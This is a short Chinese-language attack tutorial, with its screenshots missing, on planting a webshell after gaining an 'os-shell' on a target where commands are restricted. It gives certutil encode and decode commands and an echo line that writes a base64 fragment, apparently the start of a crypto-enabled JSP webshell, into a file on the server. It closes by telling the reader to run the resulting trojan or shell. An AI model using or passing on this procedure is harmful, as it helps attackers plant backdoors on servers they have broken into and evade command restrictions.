编码

当进入到os-shell但是无法执行相关命令,采用该方式可绕过
**certutil -encode err.jsp errs.jsp**
image.png
内容如下:
image.png
提取出来之后
** echo "PCVAcGFnZSBpbXBvcnQ9ImphdmF4LnV0aWwuKixqYXZheC5jcnlwdG8uKixqYXZh" >> 1.asp**
image.png
image.png
得到生成的一个1.asp
image.png

解码

**certutil -decode rr.jsp rrr.jsp**
image.png

解密明文

image.png
最终,再本地执行该木马或者shell即可